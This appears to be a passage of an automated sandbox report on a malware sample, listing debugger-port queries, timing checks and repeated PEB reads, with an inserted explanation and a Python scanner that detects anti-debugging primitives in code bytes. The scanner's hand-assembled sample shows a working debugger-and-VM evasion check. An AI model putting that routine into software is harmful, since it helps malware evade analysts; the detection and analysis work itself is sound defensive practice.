Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C096E rdtsc 4_2_014C096E
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C2B60 NtClose,LdrInitializeThunk, 4_2_014C2B60
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_00162802 #797,GetCurrentThread,SetThreadDescription,IsDebuggerPresent,RegOpenKeyExW,GetCurrentProcessId,RegCloseKey,ExitProcess, 9_2_00162802
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 9_2_0014AA8C GetCurrentThreadId,LoadLibraryW,GetProcAddress, 9_2_0014AA8C
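The DebugPort query, the IsDebuggerPresent call and the long run of "mov eax, dword ptr fs:[00000030h]" entries that follows all reach the same data: in 32-bit code fs:[30h] is the PEB, and IsDebuggerPresent simply returns the BeingDebugged byte at PEB+2. A PEB read on its own is not an anti-debug check; ntdll, the loader and the CRT read the PEB constantly, which is why the report lists hundreds of them. What separates a debugger check from noise is the field read immediately afterwards, and what separates an RDTSC timing check from a plain timestamp is a second rdtsc a few bytes later, as in the 6-byte-apart pair the interceptor logged. The scanner below, an added example that is not part of the report or of the sandbox's tooling, finds the 32-bit encodings of these primitives in a code blob and only reports a PEB read when a byte load from [eax+2] follows within a short window, and only reports rdtsc when a second one follows within 32 bytes. The input bytes are hand-assembled for this example, not taken from the sample.

```python
# 32-bit x86 encodings of the evasion primitives the report flags.
PRIMITIVES = [
    ("mov eax, fs:[30h] (PEB, moffs form)", bytes.fromhex("64A130000000")),
    ("mov eax, fs:[30h] (PEB, ModRM form)", bytes.fromhex("648B0530000000")),
    ("mov ecx, fs:[30h] (PEB)", bytes.fromhex("648B0D30000000")),
    ("rdtsc", bytes.fromhex("0F31")),
]
# Reads of PEB.BeingDebugged once the PEB pointer is in eax.
BEING_DEBUGGED_READS = [
    bytes.fromhex("0FB64002"),  # movzx eax, byte ptr [eax+2]
    bytes.fromhex("8A4002"),    # mov al, byte ptr [eax+2]
]


def scan(blob):
    """Every occurrence of every primitive as (offset, name, length), sorted by offset."""
    hits = []
    for name, pat in PRIMITIVES:
        start = 0
        while (i := blob.find(pat, start)) != -1:
            hits.append((i, name, len(pat)))
            start = i + 1
    return sorted(hits)


def rdtsc_pairs(hits, window=32):
    """Consecutive rdtsc instructions close enough to be a delta-timing check."""
    offs = [o for o, name, _ in hits if name == "rdtsc"]
    return [(a, b) for a, b in zip(offs, offs[1:]) if b - a <= window]


def peb_being_debugged_checks(blob, hits, window=8):
    """PEB loads into eax that are followed by a BeingDebugged read within `window` bytes.
    Returns (offset of the PEB load, offset of the byte read)."""
    found = []
    for off, name, size in hits:
        if not name.startswith("mov eax, fs:[30h]"):
            continue
        tail = blob[off + size: off + size + window]
        for pat in BEING_DEBUGGED_READS:
            idx = tail.find(pat)
            if idx != -1:
                found.append((off, off + size + idx))
                break
    return found


# Constructed input: a hand-assembled 32-bit routine that performs both checks.
SAMPLE = bytes.fromhex(
    "55 8B EC"           # push ebp; mov ebp, esp
    "64 A1 30 00 00 00"  # mov eax, fs:[30h]            ; PEB
    "0F B6 40 02"        # movzx eax, byte ptr [eax+2]  ; PEB.BeingDebugged
    "85 C0"              # test eax, eax
    "75 10"              # jne  +16                     ; debugger present
    "0F 31"              # rdtsc
    "33 C9"              # xor ecx, ecx
    "03 C8"              # add ecx, eax                 ; save low dword
    "0F 31"              # rdtsc
    "2B C1"              # sub eax, ecx                 ; delta
    "3D 00 10 00 00"     # cmp eax, 1000h
    "77 00"              # ja   +0                      ; too slow: VM/debugger
    "5D C3"              # pop ebp; ret
)


def report(blob):
    hits = scan(blob)
    return {
        "primitives": [(o, n) for o, n, _ in hits],
        "rdtsc_pairs": rdtsc_pairs(hits),
        "being_debugged_checks": peb_being_debugged_checks(blob, hits),
    }


if __name__ == "__main__":
    for key, value in report(SAMPLE).items():
        print(key, value)
```

Run it over an unpacked region dumped from the hollowed process rather than the on-disk .NET loader; the crypter's native stage is where these sequences live. Expect false positives in data sections, since a byte scanner has no notion of instruction boundaries.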
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01518158 mov eax, dword ptr fs:[00000030h] 4_2_01518158
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0147C156 mov eax, dword ptr fs:[00000030h] 4_2_0147C156
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01514144 mov eax, dword ptr fs:[00000030h] 4_2_01514144
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01514144 mov eax, dword ptr fs:[00000030h] 4_2_01514144
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01514144 mov ecx, dword ptr fs:[00000030h] 4_2_01514144
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01514144 mov eax, dword ptr fs:[00000030h] 4_2_01514144
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01514144 mov eax, dword ptr fs:[00000030h] 4_2_01514144
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01486154 mov eax, dword ptr fs:[00000030h] 4_2_01486154
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01486154 mov eax, dword ptr fs:[00000030h] 4_2_01486154
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01554164 mov eax, dword ptr fs:[00000030h] 4_2_01554164
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01554164 mov eax, dword ptr fs:[00000030h] 4_2_01554164
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01540115 mov eax, dword ptr fs:[00000030h] 4_2_01540115
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0152A118 mov ecx, dword ptr fs:[00000030h] 4_2_0152A118
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0152A118 mov eax, dword ptr fs:[00000030h] 4_2_0152A118
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0152A118 mov eax, dword ptr fs:[00000030h] 4_2_0152A118
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0152A118 mov eax, dword ptr fs:[00000030h] 4_2_0152A118
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0152E10E mov eax, dword ptr fs:[00000030h] 4_2_0152E10E
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0152E10E mov ecx, dword ptr fs:[00000030h] 4_2_0152E10E
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0152E10E mov eax, dword ptr fs:[00000030h] 4_2_0152E10E
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0152E10E mov eax, dword ptr fs:[00000030h] 4_2_0152E10E
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0152E10E mov ecx, dword ptr fs:[00000030h] 4_2_0152E10E
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0152E10E mov eax, dword ptr fs:[00000030h] 4_2_0152E10E
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0152E10E mov eax, dword ptr fs:[00000030h] 4_2_0152E10E
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0152E10E mov ecx, dword ptr fs:[00000030h] 4_2_0152E10E
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0152E10E mov eax, dword ptr fs:[00000030h] 4_2_0152E10E
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0152E10E mov ecx, dword ptr fs:[00000030h] 4_2_0152E10E
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B0124 mov eax, dword ptr fs:[00000030h] 4_2_014B0124
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015461C3 mov eax, dword ptr fs:[00000030h] 4_2_015461C3
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015461C3 mov eax, dword ptr fs:[00000030h] 4_2_015461C3
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014FE1D0 mov eax, dword ptr fs:[00000030h] 4_2_014FE1D0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014FE1D0 mov eax, dword ptr fs:[00000030h] 4_2_014FE1D0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014FE1D0 mov ecx, dword ptr fs:[00000030h] 4_2_014FE1D0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014FE1D0 mov eax, dword ptr fs:[00000030h] 4_2_014FE1D0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014FE1D0 mov eax, dword ptr fs:[00000030h] 4_2_014FE1D0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015561E5 mov eax, dword ptr fs:[00000030h] 4_2_015561E5
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B01F8 mov eax, dword ptr fs:[00000030h] 4_2_014B01F8
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C0185 mov eax, dword ptr fs:[00000030h] 4_2_014C0185
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0150019F mov eax, dword ptr fs:[00000030h] 4_2_0150019F
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0150019F mov eax, dword ptr fs:[00000030h] 4_2_0150019F
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0150019F mov eax, dword ptr fs:[00000030h] 4_2_0150019F
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0150019F mov eax, dword ptr fs:[00000030h] 4_2_0150019F
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0147A197 mov eax, dword ptr fs:[00000030h] 4_2_0147A197
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0147A197 mov eax, dword ptr fs:[00000030h] 4_2_0147A197
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0147A197 mov eax, dword ptr fs:[00000030h] 4_2_0147A197
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01524180 mov eax, dword ptr fs:[00000030h] 4_2_01524180
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01524180 mov eax, dword ptr fs:[00000030h] 4_2_01524180
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0153C188 mov eax, dword ptr fs:[00000030h] 4_2_0153C188
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0153C188 mov eax, dword ptr fs:[00000030h] 4_2_0153C188
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01506050 mov eax, dword ptr fs:[00000030h] 4_2_01506050
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01482050 mov eax, dword ptr fs:[00000030h] 4_2_01482050
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014AC073 mov eax, dword ptr fs:[00000030h] 4_2_014AC073
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01504000 mov ecx, dword ptr fs:[00000030h] 4_2_01504000
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01522000 mov eax, dword ptr fs:[00000030h] 4_2_01522000
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01522000 mov eax, dword ptr fs:[00000030h] 4_2_01522000
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01522000 mov eax, dword ptr fs:[00000030h] 4_2_01522000
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01522000 mov eax, dword ptr fs:[00000030h] 4_2_01522000
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01522000 mov eax, dword ptr fs:[00000030h] 4_2_01522000
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01522000 mov eax, dword ptr fs:[00000030h] 4_2_01522000
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01522000 mov eax, dword ptr fs:[00000030h] 4_2_01522000
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01522000 mov eax, dword ptr fs:[00000030h] 4_2_01522000
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0149E016 mov eax, dword ptr fs:[00000030h] 4_2_0149E016
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0149E016 mov eax, dword ptr fs:[00000030h] 4_2_0149E016
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0149E016 mov eax, dword ptr fs:[00000030h] 4_2_0149E016
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0149E016 mov eax, dword ptr fs:[00000030h] 4_2_0149E016
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01516030 mov eax, dword ptr fs:[00000030h] 4_2_01516030
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0147A020 mov eax, dword ptr fs:[00000030h] 4_2_0147A020
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0147C020 mov eax, dword ptr fs:[00000030h] 4_2_0147C020
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015020DE mov eax, dword ptr fs:[00000030h] 4_2_015020DE
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014880E9 mov eax, dword ptr fs:[00000030h] 4_2_014880E9
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0147A0E3 mov ecx, dword ptr fs:[00000030h] 4_2_0147A0E3
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015060E0 mov eax, dword ptr fs:[00000030h] 4_2_015060E0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0147C0F0 mov eax, dword ptr fs:[00000030h] 4_2_0147C0F0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014C20F0 mov ecx, dword ptr fs:[00000030h] 4_2_014C20F0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0148208A mov eax, dword ptr fs:[00000030h] 4_2_0148208A
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014780A0 mov eax, dword ptr fs:[00000030h] 4_2_014780A0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015460B8 mov eax, dword ptr fs:[00000030h] 4_2_015460B8
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015460B8 mov ecx, dword ptr fs:[00000030h] 4_2_015460B8
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015180A8 mov eax, dword ptr fs:[00000030h] 4_2_015180A8
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01528350 mov ecx, dword ptr fs:[00000030h] 4_2_01528350
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0154A352 mov eax, dword ptr fs:[00000030h] 4_2_0154A352
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0150035C mov eax, dword ptr fs:[00000030h] 4_2_0150035C
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0150035C mov eax, dword ptr fs:[00000030h] 4_2_0150035C
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0150035C mov eax, dword ptr fs:[00000030h] 4_2_0150035C
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0150035C mov ecx, dword ptr fs:[00000030h] 4_2_0150035C
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0150035C mov eax, dword ptr fs:[00000030h] 4_2_0150035C
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0150035C mov eax, dword ptr fs:[00000030h] 4_2_0150035C
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01502349 mov eax, dword ptr fs:[00000030h] 4_2_01502349
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01502349 mov eax, dword ptr fs:[00000030h] 4_2_01502349
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01502349 mov eax, dword ptr fs:[00000030h] 4_2_01502349
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01502349 mov eax, dword ptr fs:[00000030h] 4_2_01502349
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01502349 mov eax, dword ptr fs:[00000030h] 4_2_01502349
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01502349 mov eax, dword ptr fs:[00000030h] 4_2_01502349
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01502349 mov eax, dword ptr fs:[00000030h] 4_2_01502349
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01502349 mov eax, dword ptr fs:[00000030h] 4_2_01502349
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01502349 mov eax, dword ptr fs:[00000030h] 4_2_01502349
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01502349 mov eax, dword ptr fs:[00000030h] 4_2_01502349
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01502349 mov eax, dword ptr fs:[00000030h] 4_2_01502349
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01502349 mov eax, dword ptr fs:[00000030h] 4_2_01502349
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01502349 mov eax, dword ptr fs:[00000030h] 4_2_01502349
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01502349 mov eax, dword ptr fs:[00000030h] 4_2_01502349
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01502349 mov eax, dword ptr fs:[00000030h] 4_2_01502349
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0155634F mov eax, dword ptr fs:[00000030h] 4_2_0155634F
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0152437C mov eax, dword ptr fs:[00000030h] 4_2_0152437C
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BA30B mov eax, dword ptr fs:[00000030h] 4_2_014BA30B
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BA30B mov eax, dword ptr fs:[00000030h] 4_2_014BA30B
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014BA30B mov eax, dword ptr fs:[00000030h] 4_2_014BA30B
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0147C310 mov ecx, dword ptr fs:[00000030h] 4_2_0147C310
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014A0310 mov ecx, dword ptr fs:[00000030h] 4_2_014A0310
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01558324 mov eax, dword ptr fs:[00000030h] 4_2_01558324
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01558324 mov ecx, dword ptr fs:[00000030h] 4_2_01558324
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01558324 mov eax, dword ptr fs:[00000030h] 4_2_01558324
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01558324 mov eax, dword ptr fs:[00000030h] 4_2_01558324
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015243D4 mov eax, dword ptr fs:[00000030h] 4_2_015243D4
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015243D4 mov eax, dword ptr fs:[00000030h] 4_2_015243D4
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0148A3C0 mov eax, dword ptr fs:[00000030h] 4_2_0148A3C0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0148A3C0 mov eax, dword ptr fs:[00000030h] 4_2_0148A3C0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0148A3C0 mov eax, dword ptr fs:[00000030h] 4_2_0148A3C0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0148A3C0 mov eax, dword ptr fs:[00000030h] 4_2_0148A3C0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0148A3C0 mov eax, dword ptr fs:[00000030h] 4_2_0148A3C0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0148A3C0 mov eax, dword ptr fs:[00000030h] 4_2_0148A3C0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014883C0 mov eax, dword ptr fs:[00000030h] 4_2_014883C0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014883C0 mov eax, dword ptr fs:[00000030h] 4_2_014883C0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014883C0 mov eax, dword ptr fs:[00000030h] 4_2_014883C0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014883C0 mov eax, dword ptr fs:[00000030h] 4_2_014883C0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0152E3DB mov eax, dword ptr fs:[00000030h] 4_2_0152E3DB
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0152E3DB mov eax, dword ptr fs:[00000030h] 4_2_0152E3DB
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0152E3DB mov ecx, dword ptr fs:[00000030h] 4_2_0152E3DB
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0152E3DB mov eax, dword ptr fs:[00000030h] 4_2_0152E3DB
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015063C0 mov eax, dword ptr fs:[00000030h] 4_2_015063C0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0153C3CD mov eax, dword ptr fs:[00000030h] 4_2_0153C3CD
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014903E9 mov eax, dword ptr fs:[00000030h] 4_2_014903E9
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014903E9 mov eax, dword ptr fs:[00000030h] 4_2_014903E9
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014903E9 mov eax, dword ptr fs:[00000030h] 4_2_014903E9
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014903E9 mov eax, dword ptr fs:[00000030h] 4_2_014903E9
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014903E9 mov eax, dword ptr fs:[00000030h] 4_2_014903E9
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014903E9 mov eax, dword ptr fs:[00000030h] 4_2_014903E9
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014903E9 mov eax, dword ptr fs:[00000030h] 4_2_014903E9
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014903E9 mov eax, dword ptr fs:[00000030h] 4_2_014903E9
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014B63FF mov eax, dword ptr fs:[00000030h] 4_2_014B63FF
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0149E3F0 mov eax, dword ptr fs:[00000030h] 4_2_0149E3F0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0149E3F0 mov eax, dword ptr fs:[00000030h] 4_2_0149E3F0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0149E3F0 mov eax, dword ptr fs:[00000030h] 4_2_0149E3F0
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014A438F mov eax, dword ptr fs:[00000030h] 4_2_014A438F
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_014A438F mov eax, dword ptr fs:[00000030h] 4_2_014A438F
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0147E388 mov eax, dword ptr fs:[00000030h] 4_2_0147E388
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0147E388 mov eax, dword ptr fs:[00000030h] 4_2_0147E388
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0147E388 mov eax, dword ptr fs:[00000030h] 4_2_0147E388
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01478397 mov eax, dword ptr fs:[00000030h] 4_2_01478397
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01478397 mov eax, dword ptr fs:[00000030h] 4_2_01478397
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01478397 mov eax, dword ptr fs:[00000030h] 4_2_01478397
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0153A250 mov eax, dword ptr fs:[00000030h] 4_2_0153A250
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0153A250 mov eax, dword ptr fs:[00000030h] 4_2_0153A250
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0155625D mov eax, dword ptr fs:[00000030h] 4_2_0155625D
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01486259 mov eax, dword ptr fs:[00000030h] 4_2_01486259
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01508243 mov eax, dword ptr fs:[00000030h] 4_2_01508243
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01508243 mov ecx, dword ptr fs:[00000030h] 4_2_01508243
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0147A250 mov eax, dword ptr fs:[00000030h] 4_2_0147A250
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01530274 mov eax, dword ptr fs:[00000030h] 4_2_01530274
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01530274 mov eax, dword ptr fs:[00000030h] 4_2_01530274
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01530274 mov eax, dword ptr fs:[00000030h] 4_2_01530274
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01530274 mov eax, dword ptr fs:[00000030h] 4_2_01530274
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01530274 mov eax, dword ptr fs:[00000030h] 4_2_01530274
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01530274 mov eax, dword ptr fs:[00000030h] 4_2_01530274
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01530274 mov eax, dword ptr fs:[00000030h] 4_2_01530274
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01530274 mov eax, dword ptr fs:[00000030h] 4_2_01530274
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01530274 mov eax, dword ptr fs:[00000030h] 4_2_01530274
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01530274 mov eax, dword ptr fs:[00000030h] 4_2_01530274
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01530274 mov eax, dword ptr fs:[00000030h] 4_2_01530274
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01530274 mov eax, dword ptr fs:[00000030h] 4_2_01530274
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01484260 mov eax, dword ptr fs:[00000030h] 4_2_01484260
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01484260 mov eax, dword ptr fs:[00000030h] 4_2_01484260
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_01484260 mov eax, dword ptr fs:[00000030h] 4_2_01484260
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0147826B mov eax, dword ptr fs:[00000030h] 4_2_0147826B
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0147823B mov eax, dword ptr fs:[00000030h] 4_2_0147823B
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_015562D6 mov eax, dword ptr fs:[00000030h] 4_2_015562D6
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0148A2C3 mov eax, dword ptr fs:[00000030h] 4_2_0148A2C3
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0148A2C3 mov eax, dword ptr fs:[00000030h] 4_2_0148A2C3
Source: C:\Users\user\Desktop\yaM8XR1HfL.exe Code function: 4_2_0148A2C3 mov eax, dword ptr fs:[00000030h] 4_2_0148A2C3
